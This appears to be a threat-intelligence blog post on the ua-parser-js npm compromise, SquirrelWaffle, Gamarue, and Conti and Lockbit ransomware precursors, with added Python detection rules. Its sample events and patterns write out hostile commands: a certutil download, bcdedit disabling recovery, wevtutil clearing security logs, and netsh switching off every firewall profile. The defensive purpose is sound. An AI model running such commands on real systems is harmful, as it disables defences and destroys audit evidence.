NodeJS with a side of XMRig
Third-party developer libraries and packages are an inescapable part of modern development, and the compromise of one package can cascade to every package that depends on it. While fallout from a compromise of a popular NPM package last month appears relatively limited, the incident was a stark reminder of how adversaries can exploit organizations’ reliance on trusted development tools. In fact, as we’re getting ready to publish this, we’re investigating a new potentially compromised package.
The compromised package, ua-parser-js, distributed an XMRig cryptominer to Windows and Linux systems, as well as an infostealer (likely DanaBot) to Windows systems. Though the package is downloaded nearly 8 million times each week and the impact could have been widespread, GitHub quickly issued an advisory warning users that updating that package, or anything that depended on it, would initiate malicious behavior on affected systems.
In this case, we detected the compromised version of ua-parser-js with detectors designed to identify the cryptominer and infostealer it distributed. Detection opportunities for this category of threat inherently depend on which malware a poisoned package contains.
Detection opportunity: Certutil downloading a file
This detection opportunity will identify instances of Certificate Authority Utility (certutil.exe) with command-line arguments to download an arbitrary file. This behavior is commonly observed across multiple threats and is one reliable method adversaries use to download tools on Windows.
When TR delivers SquirrelWaffle, ransomware precursors may soon follow…
In late October 2021, Red Canary observed an uptick in detections involving TR (a delivery affiliate) and SquirrelWaffle. In some cases where we detected TR delivering SquirrelWaffle, we observed additional payloads and domain reconnaissance beginning within minutes. The short dwell time, combined with recent external reporting that suggests new TR tradecraft can bypass certain email protections, highlights the need to detect and respond to these behaviors in near real time to avoid late-stage activity such as ransomware.
- Recent initial access tradecraft may allow adversaries to bypass certain protections provided by secure email gateways, increasing the odds that a malicious email is delivered to users’ inboxes. In early November, security researchers reported that TR used compromised, on-premises Exchange servers to send malicious emails to potential victims. As context, successful exploitation of Microsoft Exchange on-premises products enables system access, control of an enterprise email server, and access to enterprise email accounts. This access effectively allows an adversary to send and receive email from a victim’s account with the legitimacy of a trusted, internal sender.
- Decreased dwell time underscores the criticality of detecting and responding to ransomware precursor activity quickly. In one incident, operators executed Cobalt Strike and BloodHound—hallmark ransomware precursors—only 75 minutes after a user first opened the malicious XLS phishing lure that initiated SquirrelWaffle. Short dwell times necessitate a clear understanding of adversary behavior and a robust toolbox of detection analytics to identify this behavior.
Detection opportunity: Excel spawning Regsvr32
This detection opportunity will identify instances of regsvr32.exe spawning as a child process of Microsoft Excel. This behavior is commonly observed in malicious documents with macros or Dynamic Data Exchange (DDE) execution, notably SquirrelWaffle XLS documents delivered by TR.
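The two process-creation analytics above (certutil downloading a file, and Excel spawning regsvr32) expressed as executable rules over process-start telemetry. This is an added example, not Red Canary's analytic; the event record layout (parent_process, process, command_line), the hostname example.invalid and all file paths are constructed for illustration.

```python
"""Two process-creation analytics from the text: certutil.exe downloading a file and
regsvr32.exe spawned by Excel. Added example, not Red Canary's analytic; the event
records, field names and sample paths are constructed."""
import ntpath
import re

# certutil verbs that fetch a URL; -f forces the download even if a cached copy exists.
CERTUTIL_FETCH_VERBS = ("-urlcache", "-verifyctl")
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def image_name(path):
    """Lower-case basename of an image path, tolerating forward slashes."""
    return ntpath.basename(path.replace("/", "\\")).lower()


def certutil_download(event):
    """True when certutil.exe is given a fetch verb and a URL, e.g. -urlcache -split -f http://..."""
    if image_name(event["process"]) != "certutil.exe":
        return False
    args = event["command_line"].lower()
    return any(v in args for v in CERTUTIL_FETCH_VERBS) and URL_RE.search(args) is not None


def excel_spawning_regsvr32(event):
    """True when Excel is the parent of regsvr32.exe, as with SquirrelWaffle XLS lures."""
    return (image_name(event["parent_process"]) == "excel.exe"
            and image_name(event["process"]) == "regsvr32.exe")


RULES = {
    "Certutil downloading a file": certutil_download,
    "Excel spawning Regsvr32": excel_spawning_regsvr32,
}


def evaluate(events):
    """Return (rule name, process image) for every event that matches a rule."""
    return [(name, e["process"]) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed sample events; example.invalid and the file paths are placeholders, not indicators.
SAMPLE_EVENTS = [
    {"parent_process": r"C:\Windows\System32\cmd.exe", "process": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -urlcache -split -f http://example.invalid/a.bin C:\Users\Public\a.bin"},
    {"parent_process": r"C:\Windows\System32\cmd.exe", "process": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -hashfile C:\Users\Public\a.bin SHA256"},  # benign use, no URL
    {"parent_process": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "process": r"C:\Windows\SysWOW64\regsvr32.exe", "command_line": r"regsvr32.exe /s C:\Users\user\AppData\Local\Temp\x.ocx"},
    {"parent_process": r"C:\Windows\explorer.exe", "process": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\legit.dll"'},  # normal registration
]
```

`evaluate(SAMPLE_EVENTS)` flags only the first certutil event and the Excel-parented regsvr32; the hash check and the explorer-parented registration pass.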
With a twinkle in its eyes, Gamarue makes the ascent
While most of us were reaching for our favorite pumpkin spice latte this past month, Gamarue’s spot in our rankings suggests that many others opted to reach for their thumb drives instead. Gamarue is a malware family used as part of a botnet. Some variants of Gamarue are worms and frequently spread via infected USB drives. Gamarue has also been used to spread other malware, steal information, and perform other activities such as click fraud. This malware was first seen more than 10 years ago and evolved into multiple variants before the operator was arrested in 2017.
Though Gamarue is no longer actively developed, it remains a pervasive threat. This highlights the notion that even if a threat is no longer active, it still warrants consideration from defenders tasked with responding to threats and building new detection logic.
Detection opportunity: Rundll32 Gamarue CLI
While we prefer detection opportunities that identify many different threats by flagging uncommon types of behavior, this detection opportunity focuses on activity that is specific to several Gamarue variants. Below you will find various examples that can be used to identify these variants executing.
In conjunction with this detection opportunity, you may be able to identify the name of an infected thumb drive that was plugged into the endpoint by looking, at the same time, for registry modifications to UserAssist registry keys containing the ROT13-encoded string .yax. These registry values can be decoded to look something like f:\usb drive (8gb).lnk, which may be indicative of a USB drive being the culprit.
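The UserAssist decoding described above, as an added example rather than Red Canary's analytic: ROT13 leaves digits and punctuation alone, so a shortcut entry ends in .yax and the drive letter survives as a shifted letter. The UserAssist key path is the real one; the GUID subkey placeholder and all value names are constructed.

```python
"""Decode ROT13 UserAssist value names and flag shortcut (.lnk) entries on non-system
drives, as described above for Gamarue. Added example, not Red Canary's analytic; the
UserAssist key path is real, the GUID subkey and value names below are constructed."""
import codecs
import re

USERASSIST_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"
# ROT13 only touches letters, so ".lnk" is stored as ".yax" and "f:\" as "s:\".
ENCODED_LNK_SUFFIX = ".yax"
NON_SYSTEM_DRIVE_RE = re.compile(r"^[abd-z]:\\", re.IGNORECASE)  # any drive letter but C:


def decode_userassist_name(value_name):
    """Undo the ROT13 obfuscation; digits, spaces and punctuation pass through unchanged."""
    return codecs.decode(value_name, "rot_13")


def removable_drive_shortcuts(modified_values):
    """Given (registry key, value name) pairs from registry-modification telemetry, return
    the decoded .lnk paths that point at a drive other than C:, e.g. f:\\usb drive (8gb).lnk."""
    hits = []
    for key, name in modified_values:
        if not key.lower().startswith(USERASSIST_KEY.lower()):
            continue                      # not a UserAssist value
        if not name.lower().endswith(ENCODED_LNK_SUFFIX):
            continue                      # not a shortcut entry
        decoded = decode_userassist_name(name)
        if NON_SYSTEM_DRIVE_RE.match(decoded):
            hits.append(decoded)
    return hits


COUNT_KEY = USERASSIST_KEY + r"\{PLACEHOLDER-GUID}\Count"   # real installs use a fixed GUID here
SAMPLE_MODIFICATIONS = [  # constructed
    (COUNT_KEY, r"s:\hfo qevir (8to).yax"),                  # f:\usb drive (8gb).lnk -> flagged
    (COUNT_KEY, r"p:\hfref\choyvp\qrfxgbc\abgrcnq.yax"),     # c:\users\public\desktop\notepad.lnk
    (COUNT_KEY, r"s:\frghc.rkr"),                            # f:\setup.exe, not a shortcut
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", r"s:\hfo qevir (8to).yax"),  # wrong key
]
```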
Detection opportunity: Rundll32 spawning Explorer
This detection opportunity hinges on the likelihood of rundll32.exe spawning explorer.exe. Red Canary often observes Gamarue spawning the explorer.exe process in an unusual way.
Detection opportunity: Msiexec No CLI + External Netconn
As we mentioned in our 2021 Threat Detection Report, Gamarue can still be detected by identifying instances of the Windows Installer (msiexec.exe) into which it has been injected. This type of activity can be identified by creating a detection analytic that focuses on instances of Msiexec with no associated command-line options that make an external network connection.
*Note: Double quotes (“”) within the command line mean a null (empty) command line.
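The Msiexec analytic above as a join between process-start and network-connection telemetry. This is an added example, not Red Canary's analytic; it treats "" or a bare image path as "no command-line options", defines "external" as outside RFC 1918, loopback and link-local space, and uses constructed records with TEST-NET-3 (203.0.113.0/24) standing in for a public destination.

```python
"""Msiexec with no command-line options that makes an external network connection,
the 'No CLI + External Netconn' analytic above. Added example, not Red Canary's;
it joins constructed process-start and network-connection records on process id."""
import ipaddress
import ntpath
import re

# "" (the null command line noted in the text) or a bare, possibly quoted, image path.
NO_OPTIONS_RE = re.compile(r'^\s*(?:"[^"]*"|\S+)?\s*$')
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def has_no_options(command_line):
    """True for "" or for a command line that is only the image path with nothing after it."""
    return NO_OPTIONS_RE.match(command_line) is not None


def is_external(ip_text):
    """Destination outside RFC 1918, loopback and link-local space."""
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL_NETS)


def msiexec_external_netconn(process_events, network_events):
    """Return (pid, remote ip) for each msiexec.exe started without options that then
    connected to an external address; msiexec has no reason to do this without an install job."""
    suspects = {p["pid"] for p in process_events
                if ntpath.basename(p["process"]).lower() == "msiexec.exe"
                and has_no_options(p["command_line"])}
    return [(n["pid"], n["remote_ip"]) for n in network_events
            if n["pid"] in suspects and is_external(n["remote_ip"])]


MSIEXEC = r"C:\Windows\System32\msiexec.exe"
SAMPLE_PROCESSES = [  # constructed
    {"pid": 4120, "process": MSIEXEC, "command_line": ""},                      # injected, no job
    {"pid": 5008, "process": MSIEXEC, "command_line": r"msiexec.exe /i C:\Users\user\Downloads\setup.msi /qn"},
    {"pid": 6112, "process": MSIEXEC, "command_line": f'"{MSIEXEC}"'},            # no options, internal only
]
SAMPLE_NETCONNS = [  # constructed; 203.0.113.0/24 (TEST-NET-3) stands in for a public host
    {"pid": 4120, "remote_ip": "203.0.113.10"},
    {"pid": 5008, "remote_ip": "203.0.113.20"},
    {"pid": 6112, "remote_ip": "10.0.0.5"},
]
```

Only pid 4120 is returned: 5008 carries a real install command line, and 6112 only talks to an internal address.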
New opportunities for detecting ransomware precursors
In October, we observed Conti and Lockbit affecting multiple customer environments. Fortunately, there are several opportunities to detect precursor behavior for these threats.
Conti precursor activity
In October, we observed several new Qbot TTPs in environments ultimately encrypted with Conti. Notably, we saw Qbot inject into Microsoft Synchronization Center (mobsync.exe) and drop Conti DLLs. Additionally, we saw Qbot inject into Windows Error Reporting (werfault.exe) with no command-line parameters. Following this, the adversary used the xcopy utility to copy the malicious DLLs to different locations on the system. There are multiple opportunities to detect this activity in your environment:
Detection opportunity: Mobsync creating unusual DLL files
This detection analytic will identify an unusual file modification stemming from the mobsync.exe process. We determined this file was Conti ransomware in one incident.
Detection opportunity: Werfault spawning with no command-line parameters
This detection analytic will identify unusual activity originating from the werfault.exe process. Werfault typically spawns with command-line parameters when a process crashes, providing the program with input to create an error report.
Detection opportunity: Xcopy moving files from Group Policy Object (GPO) storage folder
Qbot created malicious files within the GPO storage folder during execution. Then, it used the Extended Copy Utility (xcopy.exe) to copy malicious DLLs, including Conti. The following analytic will identify this activity:
31B2F340-016D-11D2-945F-00C04FB984F9 is the default domain policy GUID
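The three Conti precursor analytics above (mobsync writing a DLL, werfault with no parameters, xcopy copying out of a GPO storage folder) over constructed telemetry. This is an added example, not Red Canary's analytics; it generalises the folder check to any policy GUID under \Policies\ and lets you compare the result against the Default Domain Policy GUID from the text. The event layout, the domain corp.example and all file names are constructed.

```python
"""Conti precursor analytics from the text: mobsync.exe writing a DLL, werfault.exe with no
parameters, xcopy.exe copying out of a GPO storage folder. Added example, not Red Canary's
analytics; the GPO check accepts any policy GUID. All events below are constructed."""
import ntpath
import re

DEFAULT_DOMAIN_POLICY_GUID = "31B2F340-016D-11D2-945F-00C04FB984F9"   # from the text
GPO_FOLDER_RE = re.compile(r"\\Policies\\\{([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}\\", re.I)
ARG_RE = re.compile(r'"([^"]*)"|(\S+)')   # Windows-style split into quoted or bare tokens


def split_args(command_line):
    return [quoted or bare for quoted, bare in ARG_RE.findall(command_line)]


def image(ev):
    return ntpath.basename(ev["process"]).lower()


def mobsync_dll_write(ev):   # Microsoft Synchronization Center has no reason to write DLLs
    return (ev["type"] == "file_modification" and image(ev) == "mobsync.exe"
            and ev["path"].lower().endswith(".dll"))


def werfault_no_parameters(ev):   # a real crash report passes -u/-p/-s style parameters
    return (ev["type"] == "process_start" and image(ev) == "werfault.exe"
            and len(split_args(ev["command_line"])) <= 1)


def xcopy_gpo_source(ev):
    """GUID of the GPO folder that xcopy's source (first non-switch argument) sits under, else None."""
    if ev["type"] != "process_start" or image(ev) != "xcopy.exe":
        return None
    paths = [a for a in split_args(ev["command_line"])[1:] if not a.startswith("/")]
    match = GPO_FOLDER_RE.search(paths[0]) if paths else None
    return match.group(1).upper() if match else None


def evaluate(events):
    """(event index, analytic name) for every event that trips one of the three analytics."""
    rules = [("Mobsync creating unusual DLL files", mobsync_dll_write),
             ("Werfault spawning with no command-line parameters", werfault_no_parameters),
             ("Xcopy moving files from GPO storage folder", lambda e: xcopy_gpo_source(e) is not None)]
    return [(i, name) for i, ev in enumerate(events) for name, rule in rules if rule(ev)]


SAMPLE_EVENTS = [  # constructed; corp.example and the file names are placeholders
    {"type": "file_modification", "process": r"C:\Windows\System32\mobsync.exe", "path": r"C:\Users\Public\sync.dll"},
    {"type": "process_start", "process": r"C:\Windows\System32\WerFault.exe", "command_line": r'"C:\Windows\System32\WerFault.exe"'},
    {"type": "process_start", "process": r"C:\Windows\System32\xcopy.exe", "command_line":
     r'xcopy.exe "\\corp.example\SYSVOL\corp.example\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\upd.dll" C:\Windows\Temp\ /Y'},
    {"type": "process_start", "process": r"C:\Windows\System32\xcopy.exe", "command_line": r"xcopy.exe C:\Users\user\Documents D:\Backup /E /Y"},
]
```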
Lockbit precursor activity
During a recent Lockbit infection, the operators used PsExec to launch a batch script, which initiated several commands designed to prepare the environment for encryption. The batch script displayed the following actions:
- set antivirus exclusion paths for C:\Windows\ that allowed malicious binaries to exist in these paths without interference
- deleted the Windows Defender service
- disabled Windows Defender, User Account Control (UAC), and Windows Recovery
- turned off all firewall rules
- cleared multiple System and Security logs
The defense evasion and system recovery commands initiated by the script offer multiple detection opportunities.
Detection opportunity: Disabling Windows Recovery via bcdedit
In combination with the other commands witnessed in the same timeframe, the use of the Boot Configuration editing tool (bcdedit.exe) to set specific recovery options helped us identify malicious activity.
Parent_process == (
Detection opportunity: Wevtutil clearing System and Security logs
The Windows Event Log Utility Tool (wevtutil.exe) process deleted both System and Security event logs. This behavior is atypical in most environments.
Detection opportunity: Netsh turning off all firewall rules
Setting all of the system firewall rules to a state of “off” should be considered suspicious and investigated further. While this may be a “normal” system administration function in some cases, it merits close review when observed with other activity associated with Lockbit.
advfirewall set allprofiles state off
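The three Lockbit detection opportunities above correlated the way the text suggests: one bcdedit, wevtutil or netsh command alone may be administration, but two or more families on one host within a short window are the batch script's signature. This is an added example, not Red Canary's analytic; the bcdedit options matched (recoveryenabled No, bootstatuspolicy ignoreallfailures) are the ones commonly associated with this technique, not quoted from the text, and hosts, timestamps and command lines are constructed.

```python
"""Correlate the LockBit batch-script behaviours described above: bcdedit disabling recovery,
wevtutil clearing System/Security logs, netsh turning every firewall profile off. Added
example, not Red Canary's analytic; bcdedit options are assumed, events are constructed."""
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # the script ran its commands within seconds of each other
CLASSIFIERS = [  # (family, image name, pattern over the lower-cased command line)
    ("recovery disabled via bcdedit", "bcdedit.exe", re.compile(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures")),
    ("System/Security log cleared via wevtutil", "wevtutil.exe", re.compile(r"\b(?:cl|clear-log)\s+(?:system|security)\b")),
    ("all firewall profiles off via netsh", "netsh.exe", re.compile(r"advfirewall\s+set\s+allprofiles\s+state\s+off")),
]


def classify(event):
    """Family name for a process event, or None when it matches no classifier."""
    image = ntpath.basename(event["process"]).lower()
    cmd = event["command_line"].lower()
    return next((fam for fam, name, pat in CLASSIFIERS if image == name and pat.search(cmd)), None)


def correlate(events):
    """{host: families} for hosts where two or more families occur within WINDOW."""
    by_host = defaultdict(list)
    for e in events:
        family = classify(e)
        if family:
            by_host[e["host"]].append((datetime.fromisoformat(e["time"]), family))
    alerts = {}
    for host, hits in by_host.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):          # slide the window from each hit
            families = {fam for t, fam in hits[i:] if t - start <= WINDOW}
            if len(families) >= 2:
                alerts[host] = families
                break
    return alerts


def ev(host, time, image, command_line):   # constructed event record
    return {"host": host, "time": time, "process": "C:\\Windows\\System32\\" + image, "command_line": command_line}


SAMPLE_EVENTS = [  # constructed
    ev("WS01", "2021-10-28T14:02:10", "bcdedit.exe", "bcdedit.exe /set {default} recoveryenabled No"),
    ev("WS01", "2021-10-28T14:02:11", "bcdedit.exe", "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    ev("WS01", "2021-10-28T14:02:15", "wevtutil.exe", "wevtutil.exe cl System"),
    ev("WS01", "2021-10-28T14:02:20", "netsh.exe", "netsh.exe advfirewall set allprofiles state off"),
    ev("WS02", "2021-10-28T09:00:00", "wevtutil.exe", "wevtutil.exe cl Application"),   # not System/Security
    ev("WS02", "2021-10-28T11:30:00", "netsh.exe", "netsh.exe advfirewall set allprofiles state off"),
]
```

WS01 alerts with all three families inside ten seconds; WS02 shows a single netsh command that, on its own, stays below the threshold.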